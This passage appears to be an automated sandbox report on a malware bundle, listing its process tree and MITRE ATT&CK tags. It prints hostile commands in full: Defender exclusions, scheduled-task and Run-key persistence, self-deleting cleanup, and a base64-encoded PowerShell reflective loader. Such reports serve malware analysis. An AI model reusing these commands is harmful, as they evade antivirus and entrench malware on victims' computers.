    "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
    3⤵
    PID:2864
- C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"
  2⤵
  PID:5056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:868
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3348
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:412
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup5.exe"
  2⤵
  PID:2400
- - C:\Users\Admin\AppData\Local\Temp\u1uo.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u1uo.0.exe"
    3⤵
    PID:3584
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\AKJKFBAFID.exe"
      4⤵
      PID:2688
    - - C:\Users\Admin\AppData\Local\Temp\AKJKFBAFID.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AKJKFBAFID.exe"
        5⤵
        
        PID:3292
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\AKJKFBAFID.exe
        6⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        7⤵
        Runs ping.exe
        
        PID:5300
- - C:\Users\Admin\AppData\Local\Temp\u1uo.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u1uo.1.exe"
    3⤵
    PID:3544
  - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
      "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
      4⤵
      PID:5236
- C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
  2⤵
  PID:312
- C:\Users\Admin\AppData\Local\Temp\Files\Document.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Document.exe"
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\Document.exe"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
    3⤵
    PID:168
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp660E.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:3924
- - C:\Users\Admin\AppData\Local\Temp\Files\Document.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Document.exe"
    3⤵
    PID:552
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
      4⤵
      PID:5136
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:6136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9E26.tmp.bat""
      4⤵
      PID:5192
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5640
    - - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        5⤵
        
        PID:5260
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:3368
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
        6⤵
        
        PID:5244
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp390E.tmp"
        6⤵
        Creates scheduled task(s)
        
        PID:4908
      - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:5744
- C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
  2⤵
  PID:236
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 604
    3⤵
    - Program crash
    PID:4008
- C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe"
  2⤵
  PID:2572
- - C:\Users\Admin\AppData\Local\Temp\1360911869.exe
    C:\Users\Admin\AppData\Local\Temp\1360911869.exe
    3⤵
    PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\1934733440.exe
      C:\Users\Admin\AppData\Local\Temp\1934733440.exe
      4⤵
      PID:5980
  - - C:\Users\Admin\AppData\Local\Temp\711828534.exe
      C:\Users\Admin\AppData\Local\Temp\711828534.exe
      4⤵
      PID:5484
  - - C:\Users\Admin\AppData\Local\Temp\3182031942.exe
      C:\Users\Admin\AppData\Local\Temp\3182031942.exe
      4⤵
      PID:5096
  - - C:\Users\Admin\AppData\Local\Temp\2827028920.exe
      C:\Users\Admin\AppData\Local\Temp\2827028920.exe
      4⤵
      PID:5592
  - - C:\Users\Admin\AppData\Local\Temp\3290232951.exe
      C:\Users\Admin\AppData\Local\Temp\3290232951.exe
      4⤵
      PID:6592
- C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe"
  2⤵
  PID:2384
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    3⤵
    PID:3188
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
    3⤵
    PID:3816
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    PID:4112
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
      4⤵
      Creates scheduled task(s)
      PID:3020
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
    3⤵
    PID:2272
- C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"
  2⤵
  PID:3708
- C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"
  2⤵
  PID:1616
- C:\Users\Admin\AppData\Local\Temp\Files\Max.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Max.exe"
  2⤵
  PID:4636
- C:\Users\Admin\AppData\Local\Temp\Files\sarra.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sarra.exe"
  2⤵
  PID:5248
- C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe"
  2⤵
  PID:5784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT /delete /yes
    3⤵
    PID:5892
  - - C:\Windows\SysWOW64\at.exe
      AT /delete /yes
      4⤵
      PID:5928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\at.exe
      AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
      4⤵
      PID:2008
- C:\Users\Admin\AppData\Local\Temp\Files\crypt.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypt.exe"
  2⤵
  PID:6044
- - C:\Windows\SysWOW64\wscript.exe
    "wscript.exe" "C:\Users\Admin\start.vbs"
    3⤵
    PID:5396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
      4⤵
      PID:2528
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"
        5⤵
        
        PID:6540
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"
        5⤵
        
        PID:5828
- C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe"
  2⤵
  PID:4112
- C:\Users\Admin\AppData\Local\Temp\Files\niks.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\niks.exe"
  2⤵
  PID:5756
- C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
  2⤵
  PID:5944
- C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
  2⤵
  PID:4424
- C:\Users\Admin\AppData\Local\Temp\Files\html.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
  2⤵
  PID:4344
- - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
    3⤵
    PID:5264
- C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe"
  2⤵
  PID:5648
- - C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
    C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
    3⤵
    PID:5480
- C:\Users\Admin\AppData\Local\Temp\Files\cacd6bf810543a9d46c9b104dfd72778.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cacd6bf810543a9d46c9b104dfd72778.exe"
  2⤵
  PID:5144
- - C:\Users\Admin\AppData\Local\Temp\Files\Hero.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Hero.exe"
    3⤵
    PID:6012
- C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe"
  2⤵
  PID:5176
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKTanthuTN.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKTanthuTN.exe"
  2⤵
  PID:5728
- C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
  2⤵
  PID:5400
- - C:\Users\Admin\AppData\Local\Temp\is-7DIL5.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-7DIL5.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp" /SL5="$60244,1495449,832512,C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
    3⤵
    PID:1012
- C:\Users\Admin\AppData\Local\Temp\Files\32.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 276
    3⤵
    - Program crash
    PID:1516
- C:\Users\Admin\AppData\Local\Temp\Files\martinvnc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\martinvnc.exe"
  2⤵
  PID:6520
- - C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k
    3⤵
    PID:6064
- C:\Users\Admin\AppData\Local\Temp\Files\cry.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cry.exe"
  2⤵
  PID:5956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6332
- C:\Users\Admin\AppData\Local\Temp\Files\123p.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\123p.exe"
  2⤵
  PID:7140
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:2908
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:2840
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:6168
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:5984
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "OBGPQMHF"
    3⤵
    - Launches sc.exe
    PID:6216
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:3384

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
- Executes dropped EXE
PID:1420

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:2928

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:3996

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:4196

C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
1⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:5136

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:2040
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:5324
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:5420
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:5460
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:364
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:2364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:2264

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
PID:6008

C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
1⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:6908

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:6984
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:6316
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:6348
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:6764
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:7080
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:6376

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:7128

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:2624
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:7128
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:7016
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:5900

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3af4855 /state1:0x41c64e6d
1⤵
PID:6544

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:2868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
